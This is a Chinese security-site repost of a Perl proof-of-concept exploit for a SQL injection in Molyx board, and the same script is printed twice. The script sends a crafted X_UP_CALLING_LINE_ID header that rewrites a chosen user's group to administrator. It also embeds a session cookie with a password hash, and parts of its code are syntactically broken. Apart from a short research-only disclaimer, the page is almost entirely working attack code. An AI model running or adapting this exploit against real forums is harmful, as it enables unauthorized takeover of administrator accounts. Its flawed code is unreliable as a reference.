molyx board X_UP_CALLING_LINE_ID sql injection Remote Privilege Exploit 's

admin
admin
admin
141215
文章
117
评论
2017年4月9日08:06:49评论225 views字数 2248阅读7分29秒阅读模式
摘要

来源:Sebug.net
# molyx board X_UP_CALLING_LINE_ID sql injection Remote Privilege Exploit
#!/usr/bin/perl -w
use IO::Socket;
## PROOF-OF-CONCEPT
## * work only with php5 or php4&&GPC=off
## Example:
## C:/>mlexp.pl 127.0.0.1 /bbs/ 1
## [~] prepare to connect...
## [+] connected
## [~] prepare to send data...
## [+] OK
## [~] wait for response...
## [+] Expoilted! Maybe Id=1 is Admin Now!!
##
if (@ARGV < 3)
{
print "/n/n";
print "|****************************************************************|/n";
print " mlexp.pl/n";
print " molyx board X_UP_CALLING_LINE_ID sql injection Remote Privilege Exploit (POC version)/n";
print " Usage: mlexp.pl <server> <folder> <user_id> /n";
print " e.g.: mlexp.pl 127.0.0.1 /bbs/ 1/n";
print " [~] <server> - server ip/n";
print " [~] <folder> - forum folder/n";
print " [~] <user_id> - user id /n";
print "|****************************************************************|/n";
print "/n/n";
exit(1);
}
$server = $ARGV[0];
$folder = $ARGV[1];
$user_id = $ARGV[2];
print "[~] prepare to connect.../n";
$socket = IO::Socket::INET->new(
Proto => "tcp",
PeerAddr => "$server",
PeerPort => "80") || die "$socket error $!";
print "[+] connected/n";
print "[~] prepare to send data.../n";
$cookie='redbbssessionid=5604730f9608848e; cnzz02=11; rtime=0; ltime=1168828899792; cnzz_eid=75851673-; redbbsuserid=52863; redbbspassword=5d0a98dc161ba9e55208f34e2b2ef473; redbbslanguage=zh-cn ';
$useragent='Opera/9.01 (Windows NT 5.1; U; zh-cn)';
$evildata="0',usergroupid=4 where id=$user_id/*";
$script='/wap/associate.php?do=1';
$path =$folder.$script;
$count=$count+1;
$message = "POST ".$folder." HTTP/1.1/r/n";
$message .= "Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1/r/n";
$message .= "Accept-Language: zh-CN,zh;q=0.9,en;q=0.8/r/n";
$message .= "Referer: http://".$server.$folder."/r/n";
$message .= "Content-Type: application/x-www-form-urlencoded/r/n";
$message .= "Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1/r/n";
$message .= "Host: ".$server."/r/n";
$message .= "User-Agent: ".$useragent."/r/n";
$message .= "Connection: Keep-Alive/r/n";
$message .= "X_UP_CALLING_LINE_ID: ".$evildata."/r/n";
$message .= "Cookie: ".$cookie."/r/n";
$message .= "/r/n";
print $socket "$message";
print "[+] OK/n";
print "[~] wait for response.../n";
while ($answer = <$socket>)
{
if ($answer =~ /操作成功完成/)
print "[+] Expoilted! Maybe Id=$user_id is Admin Now!!/n"
else print "[-] exploit failed/n";
}

来源:Sebug.net


# molyx board X_UP_CALLING_LINE_ID sql injection Remote Privilege Exploit
#!/usr/bin/perl -w
use IO::Socket;
## PROOF-OF-CONCEPT
## * work only with php5 or php4&&GPC=off
## Example:
## C:/>mlexp.pl 127.0.0.1 /bbs/ 1
## [~] prepare to connect...
## [+] connected
## [~] prepare to send data...
## [+] OK
## [~] wait for response...
## [+] Expoilted! Maybe Id=1 is Admin Now!!
##
if (@ARGV < 3)
{
print "/n/n";
print "|****************************************************************|/n";
print " mlexp.pl/n";
print " molyx board X_UP_CALLING_LINE_ID sql injection Remote Privilege Exploit (POC version)/n";
print " Usage: mlexp.pl <server> <folder> <user_id> /n";
print " e.g.: mlexp.pl 127.0.0.1 /bbs/ 1/n";
print " [~] <server> - server ip/n";
print " [~] <folder> - forum folder/n";
print " [~] <user_id> - user id /n";
print "|****************************************************************|/n";
print "/n/n";
exit(1);
}
$server = $ARGV[0];
$folder = $ARGV[1];
$user_id = $ARGV[2];
print "[~] prepare to connect.../n";
$socket = IO::Socket::INET->new(
Proto => "tcp",
PeerAddr => "$server",
PeerPort => "80") || die "$socket error $!";
print "[+] connected/n";
print "[~] prepare to send data.../n";
$cookie='redbbssessionid=5604730f9608848e; cnzz02=11; rtime=0; ltime=1168828899792; cnzz_eid=75851673-; redbbsuserid=52863; redbbspassword=5d0a98dc161ba9e55208f34e2b2ef473; redbbslanguage=zh-cn ';
$useragent='Opera/9.01 (Windows NT 5.1; U; zh-cn)';
$evildata="0',usergroupid=4 where id=$user_id/*";
$script='/wap/associate.php?do=1';
$path =$folder.$script;
$count=$count+1;
$message = "POST ".$folder." HTTP/1.1/r/n";
$message .= "Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1/r/n";
$message .= "Accept-Language: zh-CN,zh;q=0.9,en;q=0.8/r/n";
$message .= "Referer: http://".$server.$folder."/r/n";
$message .= "Content-Type: application/x-www-form-urlencoded/r/n";
$message .= "Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1/r/n";
$message .= "Host: ".$server."/r/n";
$message .= "User-Agent: ".$useragent."/r/n";
$message .= "Connection: Keep-Alive/r/n";
$message .= "X_UP_CALLING_LINE_ID: ".$evildata."/r/n";
$message .= "Cookie: ".$cookie."/r/n";
$message .= "/r/n";
print $socket "$message";
print "[+] OK/n";
print "[~] wait for response.../n";
while ($answer = <$socket>)
{
if ($answer =~ /操作成功完成/)
print "[+] Expoilted! Maybe Id=$user_id is Admin Now!!/n"
else print "[-] exploit failed/n";
}

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2017年4月9日08:06:49
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   molyx board X_UP_CALLING_LINE_ID sql injection Remote Privilege Exploit 'shttps://cn-sec.com/archives/46444.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息